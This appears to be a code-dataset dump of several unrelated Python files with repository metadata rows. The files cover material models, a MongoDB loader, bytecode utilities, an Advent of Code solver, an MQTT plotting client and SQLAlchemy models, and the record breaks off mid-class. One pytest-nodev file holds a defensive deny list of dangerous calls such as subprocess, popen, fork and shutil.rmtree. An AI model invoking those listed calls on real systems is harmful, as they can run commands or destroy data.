        Plastic strain data in tension [-].
    fr : list
        Failure ratios. Defaults to [1.16, 0.0836].

    """

    def __init__(self, name, E, v, p, fc, ec, ft, et, fr=None):
        Material.__init__(self, name=name)

        # Avoid the mutable-default-argument pitfall: a shared list default
        # would be aliased across instances if a caller ever mutated it.
        if fr is None:
            fr = [1.16, 0.0836]

        self.__name__ = 'ConcreteSmearedCrack'
        self.name = name
        self.E = {'E': E}
        self.v = {'v': v}
        self.G = {'G': 0.5 * E / (1 + v)}
        self.p = p
        self.tension = {'f': ft, 'e': et}
        self.compression = {'f': fc, 'e': ec}
        self.fratios = fr
        self.attr_list.extend(['E', 'v', 'G', 'p', 'tension', 'compression', 'fratios'])
class ConcreteDamagedPlasticity(Material):
    """Damaged-plasticity, isotropic and homogeneous concrete material.

    Parameters
    ----------
    name : str
        Material name.
    E : float
        Young's modulus E [Pa].
    v : float
        Poisson's ratio v [-].
    p : float
        Density [kg/m3].
    damage : list
        Damage parameters.
    hardening : list
        Compression hardening parameters.
    stiffening : list
        Tension stiffening parameters.

    """

    def __init__(self, name, E, v, p, damage, hardening, stiffening):
        Material.__init__(self, name=name)

        self.__name__ = 'ConcreteDamagedPlasticity'
        self.name = name
        self.E = dict(E=E)
        self.v = dict(v=v)
        # Isotropic shear modulus derived from E and v.
        self.G = dict(G=E / (2.0 * (1 + v)))
        self.p = p
        self.damage = damage
        self.hardening = hardening
        self.stiffening = stiffening
        self.attr_list.extend(['E', 'v', 'G', 'p', 'damage', 'hardening', 'stiffening'])
# ==============================================================================
# thermal
# ==============================================================================
class ThermalMaterial(Material):
    """Temperature-dependent thermal material properties.

    Parameters
    ----------
    name : str
        Material name.
    conductivity : list
        Pairs of conductivity and temperature values.
    p : list
        Pairs of density and temperature values.
    sheat : list
        Pairs of specific heat and temperature values.

    """

    def __init__(self, name, conductivity, p, sheat):
        Material.__init__(self, name=name)

        self.__name__ = 'ThermalMaterial'
        self.name = name
        self.conductivity = conductivity
        self.p = p
        self.sheat = sheat
        # Note: display order intentionally lists density first.
        self.attr_list.extend(['p', 'conductivity', 'sheat'])
| 26.242222 | 106 | 0.474807 | 1,349 | 11,809 | 4.034099 | 0.156412 | 0.061742 | 0.041896 | 0.041161 | 0.442852 | 0.376148 | 0.372473 | 0.314774 | 0.295663 | 0.286476 | 0 | 0.022158 | 0.296808 | 11,809 | 449 | 107 | 26.300668 | 0.633189 | 0.410873 | 0 | 0.386503 | 0 | 0 | 0.090792 | 0.008049 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07362 | false | 0 | 0.02454 | 0.006135 | 0.171779 | 0.030675 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa749699de26602b2730662f9b8a7ff680aac28 | 365 | py | Python | utilities/mongodb/insert.py | sosomasox/adl | 1afc2f385cbae6f1d4fefa5534f194621e4460c4 | [
"MIT"
] | null | null | null | utilities/mongodb/insert.py | sosomasox/adl | 1afc2f385cbae6f1d4fefa5534f194621e4460c4 | [
"MIT"
] | null | null | null | utilities/mongodb/insert.py | sosomasox/adl | 1afc2f385cbae6f1d4fefa5534f194621e4460c4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from pymongo import MongoClient
import json
import ast
# Insert every record of the going_out data set into the adl.adlmodels
# collection of a local MongoDB instance.
client = MongoClient('mongodb://localhost:27017/')
db = client.adl
collection = db.adlmodels

with open('../data/going_out.jsonl', 'r') as fp:
    # Iterate the file lazily instead of readlines() to avoid loading it
    # all into memory at once.
    for line in fp:
        line = line.strip()
        if not line:
            # Skip blank lines (a trailing newline would otherwise make
            # ast.literal_eval raise a SyntaxError).
            continue
        # NOTE(review): records are parsed as Python literals rather than
        # JSON despite the .jsonl extension -- confirm the file format
        # before switching to json.loads.
        record = ast.literal_eval(line)
        collection.insert_one(record)
| 22.8125 | 50 | 0.690411 | 51 | 365 | 4.843137 | 0.705882 | 0.05668 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020067 | 0.180822 | 365 | 15 | 51 | 24.333333 | 0.80602 | 0.057534 | 0 | 0 | 0 | 0 | 0.145773 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.272727 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa8cb6c6419a3d2b51a4b0411b2675939d36c2f | 4,087 | py | Python | omnibus/code.py | wrmsr/omnibus | 3c4ef5eb17b0fff8593fa6a2284337bf193c18d3 | [
"BSD-3-Clause"
] | 2 | 2020-06-17T19:54:09.000Z | 2020-06-18T20:10:26.000Z | omnibus/code.py | wrmsr/omnibus | 3c4ef5eb17b0fff8593fa6a2284337bf193c18d3 | [
"BSD-3-Clause"
] | null | null | null | omnibus/code.py | wrmsr/omnibus | 3c4ef5eb17b0fff8593fa6a2284337bf193c18d3 | [
"BSD-3-Clause"
] | null | null | null | import dis
import gc
import opcode
import sys
import textwrap
import types
import typing as ta
from . import lang
# Short aliases for the interpreter-internal types this module manipulates.
Code = types.CodeType
Function = types.FunctionType
Frame = types.FrameType


# Positional constructor arguments of types.CodeType, in order, named by
# their co_* attribute suffix.
CODE_ARGS = [
    'argcount',
    'kwonlyargcount',
    'nlocals',
    'stacksize',
    'flags',
    'code',
    'consts',
    'names',
    'varnames',
    'filename',
    'name',
    'firstlineno',
    'lnotab',
    'freevars',
    'cellvars',
]

# 'posonlyargcount' was added to CodeType in Python 3.8.  Compare the full
# (major, minor) tuple rather than version_info[1] alone, which would
# misbehave on any future major-version bump.
if sys.version_info >= (3, 8):
    CODE_ARGS.insert(1, 'posonlyargcount')


# Reverse map: compiler flag name -> bit value.
CO_FLAG_VALUES = {v: k for k, v in dis.COMPILER_FLAG_NAMES.items()}

CO_OPTIMIZED: int = CO_FLAG_VALUES['OPTIMIZED']
CO_NEWLOCALS: int = CO_FLAG_VALUES['NEWLOCALS']
CO_VARARGS: int = CO_FLAG_VALUES['VARARGS']
CO_VARKEYWORDS: int = CO_FLAG_VALUES['VARKEYWORDS']
CO_NESTED: int = CO_FLAG_VALUES['NESTED']
CO_GENERATOR: int = CO_FLAG_VALUES['GENERATOR']
CO_NOFREE: int = CO_FLAG_VALUES['NOFREE']
CO_COROUTINE: int = CO_FLAG_VALUES['COROUTINE']
CO_ITERABLE_COROUTINE: int = CO_FLAG_VALUES['ITERABLE_COROUTINE']
CO_ASYNC_GENERATOR: int = CO_FLAG_VALUES['ASYNC_GENERATOR']


# Dunder-attribute suffixes matching FunctionType's positional constructor
# arguments.
FUNCTION_ARGS = [
    'code',
    'globals',
    'name',
    'defaults',
    'closure',
]

# Bit flags describing which optional function attributes are present.
FUNC_NONE = 0
FUNC_DEFAULTS = 1
FUNC_KWDEFAULTS = 2
FUNC_ANNOTATIONS = 4
FUNC_CLOSURE = 8
class CallTypes:
    """Catalog of methods exercising each Python parameter-passing style.

    Iterating an instance yields every public method (one per call style).
    """

    def __iter__(self):
        # Yield each public callable defined on the class.
        for k, v in type(self).__dict__.items():
            if callable(v) and not k.startswith('_'):
                yield v

    def _visit(self, *args, **kwargs):
        pass

    def nullary(self):
        return self._visit()

    def arg(self, arg):
        return self._visit(arg)

    def default(self, default=None):
        return self._visit(default)

    def varargs(self, *varargs):
        return self._visit(*varargs)

    def kwonly(self, *, kwonly=None):
        return self._visit(kwonly=kwonly)

    # Positional-only parameters ('/') are a syntax error before 3.8, so the
    # method is defined via exec with this class body's locals() as the
    # target namespace.  NOTE(review): version_info[1] > 7 assumes major
    # version 3 -- confirm against the module's other version checks.
    if sys.version_info[1] > 7:
        exec(textwrap.dedent("""
        def posonly(self, /, posonly):
            return self._visit(posonly)
        """), globals(), locals())

    def kwargs(self, **kwargs):
        return self._visit(**kwargs)

    def all(self, arg, *varargs, default=None, **kwargs):
        return self._visit(arg, *varargs, default=default, **kwargs)

    def all2(self, arg0, arg1, *varargs, default0=None, default1=None, **kwargs):
        return self._visit(arg0, arg1, *varargs, default0=default0, default1=default1, **kwargs)


# Module-level singleton for iterating the call styles.
CALL_TYPES = CallTypes()
class _Op(lang.Final):
    # Attribute access resolves a bytecode op name to its numeric value,
    # e.g. op.LOAD_FAST -> opcode.opmap['LOAD_FAST'].
    def __getattr__(self, opname: str) -> int:
        return opcode.opmap[opname]


# Singleton accessor: op.<OPNAME> -> int opcode value.
op = _Op()
def make_cell(value):
    """Return a new cell object whose ``cell_contents`` is *value*.

    The original version defined the inner function but fell off the end of
    ``make_cell`` without returning anything, so it always returned None;
    the cell is obtained from the closure of a function that captures
    *value*.
    """
    def fn():
        return value  # capturing value forces it into fn's closure
    return fn.__closure__[0]
def get_code_flag_names(flags: int) -> ta.List[str]:
    """Return the names of all compiler flags set in *flags*."""
    names = []
    for name, bit in CO_FLAG_VALUES.items():
        if flags & bit:
            names.append(name)
    return names
def recode_func(func: Function, code_bytes: ta.Union[bytes, bytearray]) -> ta.Iterable[ta.Any]:
    """Build FunctionType constructor args for *func* with new bytecode.

    NOTE(review): despite the name, this returns the argument list for the
    FunctionType constructor (with the rebuilt code object spliced in), not
    a Function -- callers apparently do ``Function(*recode_func(...))``;
    confirm.
    """
    # Rebuild the code object with its bytecode replaced by code_bytes.
    codeargs = [getattr(func.__code__, f'co_{k}') for k in CODE_ARGS]
    codeargs[CODE_ARGS.index('code')] = bytes(code_bytes)
    code = Code(*codeargs)

    # Collect the function's own constructor args and swap in the new code.
    funcargs = [getattr(func, f'__{k}__') for k in FUNCTION_ARGS]
    funcargs[FUNCTION_ARGS.index('code')] = code
    return funcargs
def instruction_bytes(instrs: ta.Iterable[dis.Instruction]) -> bytes:
    """Serialize instructions to raw bytecode: (opcode, arg) pairs, None -> 0."""
    out = bytearray()
    for instr in instrs:
        out.append(instr.opcode if instr.opcode is not None else 0)
        out.append(instr.arg if instr.arg is not None else 0)
    return bytes(out)
class AmbiguousFrameException(Exception):
    """Raised when a frame's owning function cannot be uniquely identified."""
def get_frame_function(frame: Frame) -> Function:
    """
    AmbiguousFrameException should always be handled gracefully - in the presence of multiple threads (and even
    recursive invocations within a single thread) the originally invoking function may have already had its code
    patched. Callers of this code should be robust enough for this to only result in wasted work that will likely be
    redone and corrected in subsequent invocations.
    """
    # Any function whose __code__ is this frame's code object must appear
    # among the code object's GC referrers.
    refs = gc.get_referrers(frame.f_code)
    funcs = [
        r for r in refs if (
            isinstance(r, Function) and
            r.__code__ is frame.f_code
        )
    ]
    # Require exactly one match; zero or several means the mapping from
    # frame to function is ambiguous (see docstring).
    if len(funcs) != 1:
        raise AmbiguousFrameException
    return funcs[0]
| 24.473054 | 116 | 0.663567 | 541 | 4,087 | 4.809612 | 0.330869 | 0.027671 | 0.055342 | 0.057648 | 0.076095 | 0.013836 | 0 | 0 | 0 | 0 | 0 | 0.007832 | 0.218987 | 4,087 | 166 | 117 | 24.620482 | 0.807331 | 0.092244 | 0 | 0.070175 | 0 | 0 | 0.101304 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.149123 | false | 0.017544 | 0.070175 | 0.096491 | 0.377193 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa9f514b2c99066b32a9c8b4d3db858314b200e | 2,928 | py | Python | 2021/day20.py | tangarts/advent-of-code | 5879fbec1a5377d1288666a357b029f6345d4a5d | [
"MIT"
] | null | null | null | 2021/day20.py | tangarts/advent-of-code | 5879fbec1a5377d1288666a357b029f6345d4a5d | [
"MIT"
] | null | null | null | 2021/day20.py | tangarts/advent-of-code | 5879fbec1a5377d1288666a357b029f6345d4a5d | [
"MIT"
] | null | null | null |
from advent_of_code.core import parse_input, flatten
raw = """..#.#..#####.#.#.#.###.##.....###.##.#..###.####..#####..#....#..#..##..##
#..######.###...####..#..#####..##..#.#####...##.#.#..#.##..#.#......#.###
.######.###.####...#.##.##..#..#..#####.....#.#....###..#.##......#.....#.
.#..#..##..#...##.######.####.####.#.#...#.......#..#.#.#...####.##.#.....
.#..#...##.#.##..#...##.#.##..###.#......#.#.......#.#.#.####.###.##...#..
...####.#..#..#.##.#....##..#.####....##...##..#...#......#.#.......#.....
..##..####..#...#.#.#...##..#.#..###..#####........#..####......#..#
#..#.
#....
##..#
..#..
..###"""
test_enhance, test_input_image = parse_input(raw, sep="\n\n", parser=lambda s: s.replace("#", "1").replace(".", "0"))
test_enhance = "".join(test_enhance.replace("\n", ""))
test_input_image = [list(i) for i in test_input_image.split("\n")]
def pad(matrix: list, i) -> list:
    """Surround the matrix with a one-cell border of str(i).

    "['010', '100', '110']" -> ["00000", "00100", "01000", "01100"]
    """
    fill = str(i)
    padded_rows = [[fill] + list(row) + [fill] for row in matrix]
    width = len(padded_rows[0])
    # Build the two border rows separately: they must be distinct list
    # objects, since the matrix is later mutated in place.
    top = [fill for _ in range(width)]
    bottom = [fill for _ in range(width)]
    return [top] + padded_rows + [bottom]
def kernel(matrix, point, background="0"):
    """Read the 3x3 neighbourhood centred on *point* as a 9-bit binary index.

    Cells outside the matrix contribute the *background* bit.
    Returns the pair (point, index).
    """
    rows, cols = len(matrix), len(matrix[0])
    px, py = point
    bits = []
    # Row-major scan of the neighbourhood: top-left to bottom-right.
    for ox in (-1, 0, 1):
        for oy in (-1, 0, 1):
            nx, ny = px + ox, py + oy
            inside = 0 <= nx < rows and 0 <= ny < cols
            bits.append(matrix[nx][ny] if inside else background)
    return (point, int("".join(bits), 2))
def enhance_pixels(matrix, indexes, enhance):
    """Overwrite each (x, y) listed in *indexes* with the enhancement-table
    entry selected by its precomputed 9-bit kernel index.

    Mutates *matrix* in place and returns it.
    """
    for (row, col), table_index in indexes.items():
        matrix[row][col] = enhance[table_index]
    return matrix
def new_pixels(matrix, background):
    """Compute the kernel index of every cell.

    Returns a dict mapping (row, col) -> 9-bit enhancement-table index.
    """
    height, width = len(matrix), len(matrix[0])
    # kernel() already yields (point, index) pairs, so they feed dict() directly.
    return dict(
        kernel(matrix, (row, col), background)
        for row in range(height)
        for col in range(width)
    )
def enhance_image(matrix, enhance, background):
    """Run one enhancement step: grow the image by a background border,
    then rewrite every pixel from its 3x3 kernel index."""
    padded = pad(matrix, background)
    kernel_indexes = new_pixels(padded, background)
    return enhance_pixels(padded, kernel_indexes, enhance)
def run(matrix, enhance, n):
    # Apply *n* enhancement steps, then count lit ('1') pixels.
    # NOTE(review): str(i % 2) alternates the infinite background between
    # '0' and '1' each step, which models an enhancement table whose entry 0
    # is '1' (the whole background flickers). For inputs where enhance[0]
    # is '0' the background should stay '0' -- confirm against the input used.
    for i in range(n):
        matrix = enhance_image(matrix, enhance, str(i % 2))
    return list(flatten(matrix)).count("1")
def print_matrix(matrix):
    """Pretty-print a matrix of single-character strings, one row per line."""
    rendered_rows = ("".join(row) for row in matrix)
    print("\n".join(rendered_rows))
# Parse the real puzzle input with the same '#'/'.' -> '1'/'0' mapping.
enhance, input_image = parse_input('data/input20.txt', sep="\n\n",
                                   parser=lambda s: s.replace("#", "1").replace(".", "0"), test=False)  # 5326
enhance = "".join(enhance.replace("\n", ""))
input_image = [list(i) for i in input_image.split("\n")]
# part 1
assert run(input_image, enhance, 2) == 5583
# part 2
# print(run(input_image, enhance, 50))
| 32.175824 | 117 | 0.470628 | 342 | 2,928 | 3.947368 | 0.248538 | 0.059259 | 0.022222 | 0.015556 | 0.12 | 0.12 | 0.088889 | 0.057778 | 0.057778 | 0.057778 | 0 | 0.031901 | 0.197063 | 2,928 | 90 | 118 | 32.533333 | 0.542322 | 0.06694 | 0 | 0.065574 | 0 | 0 | 0.218981 | 0.189069 | 0 | 0 | 0 | 0 | 0.016393 | 1 | 0.114754 | false | 0 | 0.016393 | 0 | 0.229508 | 0.032787 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfac716a70e1d5acb5b1e13b1f148e9c8bcc5ce8 | 4,406 | py | Python | pytest_nodev/blacklists.py | nodev-io/pytest-wish | 14c9ef2a3891ac245fe572f6fb8e4649930349cb | [
"MIT"
] | 21 | 2016-02-25T18:00:39.000Z | 2021-12-13T02:58:24.000Z | pytest_nodev/blacklists.py | nodev-io/pytest-wish | 14c9ef2a3891ac245fe572f6fb8e4649930349cb | [
"MIT"
] | 18 | 2016-02-18T20:38:47.000Z | 2016-08-25T07:26:14.000Z | pytest_nodev/blacklists.py | nodev-io/pytest-wish | 14c9ef2a3891ac245fe572f6fb8e4649930349cb | [
"MIT"
] | 6 | 2016-02-26T13:45:41.000Z | 2016-08-25T05:45:58.000Z | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Alessandro Amici
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""
Regex's that blacklist problem modules and objects.
Potentially dangerous, crashing, hard hanging or simply annoying objects
belonging to the standard library and to and the pytest-nodev dependencies
are unconditionally blacklisted so that new users can test ``--candidates-from-stdlib``
without bothering with OS-level isolation.
"""
# python 2 support via python-future
from __future__ import unicode_literals
from builtins import open
MODULE_BLACKLIST = [
# underscore 'internal use' modules and objects
r'_|.*\._',
# crash
'icopen',
'ntpath',
'tests?',
r'.*\.tests?',
r'.*\.testing',
'xml.etree.ElementTree',
'pycallgraph',
'queue',
'idlelib',
# hangs
'itertools',
'bsddb',
# dangerous
'subprocess',
'smtpd',
# annoying
'antigravity', # not sure about this one :)
'this', # and about this one too!
'pydoc',
'tkinter',
'turtle',
'asyncio',
]
OBJECT_BLACKLIST = [
# underscore 'internal use' modules and objects
r'_|.*\._',
'.*:_',
# pytest internals
'_pytest.runner:exit',
'_pytest.runner:skip',
'_pytest.skipping:xfail',
'pytest_timeout:timeout_timer',
# unconditional exit
'faulthandler:_sigsegv',
'posix:abort',
'posix:_exit',
'posix:fork',
'posix:forkpty',
'pty:fork',
'_signal:default_int_handler',
'signal:default_int_handler',
'atexit.register',
# low level crashes
'numpy.fft.fftpack_lite:cffti',
'numpy.fft.fftpack_lite:rffti',
'appnope._nope:beginActivityWithOptions',
'ctypes:string_at',
'ctypes:wstring_at',
'gc:_dump_rpy_heap',
'gc:dump_rpy_heap',
'matplotlib._image:Image',
'getpass:getpass',
'getpass:unix_getpass',
'ensurepip:_run_pip',
'idlelib.rpc:SocketIO',
'numpy.core.multiarray_tests',
'.*base64.*code',
# uninterruptable hang
'compiler.ast:AugAssign',
'IPython.core.getipython:get_ipython',
'IPython.terminal.embed:InteractiveShellEmbed',
'IPython.terminal.interactiveshell:TerminalInteractiveShell',
'itertools:cycle',
'itertools:permutations',
'itertools:repeat',
'pydoc:apropos',
'logging.config:listen',
'multiprocessing.dummy.connection:Listener',
'multiprocessing.dummy.connection:Pipe',
# dangerous
'os.mkdir',
'os.command',
'pip.utils:rmtree',
'platform:popen',
'posix:popen',
'shutil.rmtree',
'turtle.write_docstringdict',
'multiprocessing.semaphore_tracker:main',
# annoying
'urllib.request:URLopener',
'urllib.request:FancyURLopener',
'urllib.request:urlopen',
'urllib.response:addbase',
'aifc.Error',
'aifc.Aifc_write',
'asyncore:file_dispatcher',
'asyncore:file_wrapper',
'sunau:open',
'sunau:Error',
'sunau:Au_write',
'tempfile:TemporaryFile',
'urllib.robotparser:RobotFileParser',
'wave:Wave_write',
'tempfile:mkdtemp',
'tempfile:mkstemp',
'tempfile:mktemp',
'multiprocessing.util',
]
# FIXME: this is a (hopefully!) temporary hack to permit adding to the object blacklist
try:
    with open('object_blacklist.txt') as extra:
        # One regex per line; skip blank lines, strip the trailing newline.
        OBJECT_BLACKLIST.extend(
            entry.rstrip('\n') for entry in extra if entry.strip())
except IOError:
    pass
| 27.886076 | 87 | 0.687472 | 519 | 4,406 | 5.741811 | 0.579961 | 0.02953 | 0.017114 | 0.020134 | 0.032215 | 0.032215 | 0.032215 | 0.032215 | 0 | 0 | 0 | 0.002254 | 0.194281 | 4,406 | 157 | 88 | 28.063694 | 0.837183 | 0.408534 | 0 | 0.020619 | 0 | 0 | 0.593518 | 0.324873 | 0 | 0 | 0 | 0.006369 | 0 | 1 | 0 | false | 0.030928 | 0.020619 | 0 | 0.020619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfacebc149bcde45d8b837419f726ea675713269 | 4,574 | py | Python | streaming_plot_client.py | Sensirion/libsensors-python | dda92824ce073b4b25f8db90150e90f092275a39 | [
"BSD-3-Clause"
] | 21 | 2015-12-31T00:35:37.000Z | 2019-10-17T08:17:07.000Z | streaming_plot_client.py | Sensirion/libsensors-python | dda92824ce073b4b25f8db90150e90f092275a39 | [
"BSD-3-Clause"
] | 5 | 2015-09-28T13:47:44.000Z | 2018-12-12T22:36:09.000Z | streaming_plot_client.py | Sensirion/libsensors-python | dda92824ce073b4b25f8db90150e90f092275a39 | [
"BSD-3-Clause"
] | 15 | 2015-11-10T10:11:35.000Z | 2021-05-20T08:41:18.000Z | #! /usr/bin/python
# -*- coding: utf-8 -*-
"""
Sample appplication that connects to a mqtt server and plots all sensor data.
It is possible to subscribe to only some sensors or to all of them by modifying
the subscription topic.
To run the script you need to install the paho MQTT library and PyQt as listed
in requirements.txt.
"""
from collections import deque
import json
from PyQt4 import QtCore, QtGui, Qt
from PyQt4.Qwt5 import QwtPlot, QwtPlotCurve, QwtLegend
import paho.mqtt.client as mqtt
MAX_LENGTH = 1000
LEGENDS = {
'sl/min': 'Flow',
'Pa': 'Differential Pressure',
u'°C': 'Temperature',
'%': 'Humidity'
}
class PlotWindow(QtGui.QMainWindow):
    """Main window holding one Qwt plot per sensor; MQTT samples are
    appended to bounded deques (MAX_LENGTH points) and replotted."""

    # Qt signal used to hop from the MQTT network thread onto the GUI thread.
    client_message = QtCore.pyqtSignal(object)

    # Pen colors handed out round-robin to newly created curves.
    colors = (
        Qt.Qt.red,
        Qt.Qt.blue,
        Qt.Qt.magenta,
        Qt.Qt.darkCyan,
        Qt.Qt.yellow,
        Qt.Qt.green,
    )
    # Class-level cursor into `colors`, shared across instances.
    color_index = -1

    def __init__(self, mqtt_client):
        super(PlotWindow, self).__init__()
        self._plots = {}  # sensor name -> QwtPlot
        self._mqtt_client = mqtt_client
        # Timestamps are plotted relative to the first sample received.
        self._first_timestamp = None
        self.setup_ui()

    def next_color(self):
        """Return the next curve color, wrapping around the palette."""
        self.color_index += 1
        if self.color_index == len(self.colors):
            self.color_index = 0
        return self.colors[self.color_index]

    def setup_ui(self):
        """Build the empty main window and wire the MQTT callbacks."""
        self.setObjectName("MainWindow")
        self.resize(800, 600)
        self.setWindowTitle('Sensirion Plot')
        central_widget = QtGui.QWidget(self)
        central_widget.setObjectName("centralwidget")
        self.vertical_layout = QtGui.QVBoxLayout(central_widget)
        self.vertical_layout.setObjectName("verticalLayout")
        self.setCentralWidget(central_widget)
        # hook events
        self._mqtt_client.on_connect = self.on_connect
        # we need the signal so the event is processed on the GUI thread
        self._mqtt_client.on_message = lambda c, d, msg: self.client_message.emit(msg)
        self.client_message.connect(self.on_client_message)

    def on_client_message(self, message):
        """Handle one MQTT sample (runs on the GUI thread via the signal)."""
        payload = json.loads(message.payload)
        # Sensor name is the second-to-last topic segment
        # (topics look like "sensors/<id>/<sensor>/<...>").
        sensor = message.topic.split('/')[-2]
        if not sensor in self._plots:
            self.add_plot(sensor, payload['units'])
        if not self._first_timestamp:
            self._first_timestamp = payload['timestamp']
        plot = self._plots[sensor]
        plot.time.append(payload['timestamp'] - self._first_timestamp)
        for i, value in enumerate(payload['values']):
            plot.data[i].append(value)
            plot.curves[i].setData(list(plot.time), list(plot.data[i]))
        plot.replot()
        return

    def add_plot(self, name, units):
        """Create a plot titled *name* with one curve per entry in *units*."""
        # legend
        legend = QwtLegend()
        legend.setFrameStyle(Qt.QFrame.Box | Qt.QFrame.Sunken)
        legend.setItemMode(QwtLegend.ClickableItem)
        # plot
        plot = QwtPlot(self)
        plot.setTitle(name.upper())
        plot.setObjectName(name)
        plot.setCanvasBackground(Qt.Qt.white)
        plot.setAxisTitle(QwtPlot.xBottom, "time [s]")
        plot.insertLegend(legend, QwtPlot.RightLegend)
        plot.time = deque(maxlen=MAX_LENGTH)
        plot.data = []
        plot.curves = []
        for i, unit in enumerate(units):
            # First unit goes on the left Y axis, all others on the right.
            position = QwtPlot.yLeft if i == 0 else QwtPlot.yRight
            curve = QwtPlotCurve(LEGENDS[unit])
            curve.setPen(Qt.QPen(self.next_color(), 2))
            curve.setYAxis(position)
            curve.attach(plot)
            plot.enableAxis(position)
            plot.setAxisTitle(position, unit)
            plot.curves.append(curve)
            plot.data.append(deque(maxlen=MAX_LENGTH))
        self.vertical_layout.addWidget(plot)
        self._plots[name] = plot

    # The callback for when the client receives a CONNACK response from the server.
    def on_connect(self, client, userdata, flags, rc):
        print("Connected with result code " + str(rc))
        # Subscribing in on_connect() means that if we lose the connection and
        # reconnect then subscriptions will be renewed.
        # this subscribes only to the sfm sensor
        # client.subscribe("sensors/+/sfm/#")
        # this subscribes to all sensors
        client.subscribe("sensors/#")
if __name__ == "__main__":
    import sys
    # Wire a paho MQTT client into the Qt application.
    client = mqtt.Client()
    app = QtGui.QApplication(sys.argv)
    mainWindow = PlotWindow(client)
    mainWindow.show()
    # NOTE(review): the broker address is hard-coded; consider a CLI argument.
    client.connect("192.168.1.10")
    client.loop_start()  # MQTT network loop runs on a background thread
    try:
        sys.exit(app.exec_())
    finally:
        client.loop_stop()
| 32.671429 | 86 | 0.638828 | 561 | 4,574 | 5.081996 | 0.413547 | 0.024553 | 0.019642 | 0.013329 | 0.016836 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008517 | 0.255575 | 4,574 | 139 | 87 | 32.906475 | 0.828488 | 0.161128 | 0 | 0 | 0 | 0 | 0.052411 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06 | false | 0 | 0.06 | 0 | 0.18 | 0.01 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfadeebda3d888464f736b1d2628712419a57a4c | 4,550 | py | Python | services/backend/app/models.py | miguelalb/resume-portal-fastapi | 286f732510925c5ad3760ca2af82098ed78e0dd9 | [
"BSD-3-Clause"
] | 1 | 2022-02-28T02:29:02.000Z | 2022-02-28T02:29:02.000Z | services/backend/app/models.py | miguelalb/resume-portal-fastapi | 286f732510925c5ad3760ca2af82098ed78e0dd9 | [
"BSD-3-Clause"
] | null | null | null | services/backend/app/models.py | miguelalb/resume-portal-fastapi | 286f732510925c5ad3760ca2af82098ed78e0dd9 | [
"BSD-3-Clause"
] | null | null | null | import uuid
from datetime import datetime
from sqlalchemy import Boolean, Column, ForeignKey, Integer, String, Text
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import relationship
from app.database import Base
class BaseMixin(object):
    """Shared properties and common functionality"""

    # Table name defaults to the lowercased class name.
    @declared_attr
    def __tablename__(cls):
        return cls.__name__.lower()

    # Client-generated UUID primary key.
    id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4, index=True)
class TimestampMixin(object):
    """Adds a creation-timestamp column (seconds since the epoch, as text)."""

    # The default must be a *callable*: the previous code passed
    # datetime.utcnow().timestamp(), which was evaluated once at import time,
    # so every inserted row shared the same "creation" time. Wrapping it in a
    # lambda defers evaluation to each INSERT.
    created_at = Column(String, default=lambda: datetime.utcnow().timestamp())
class CurrentMixin(object):
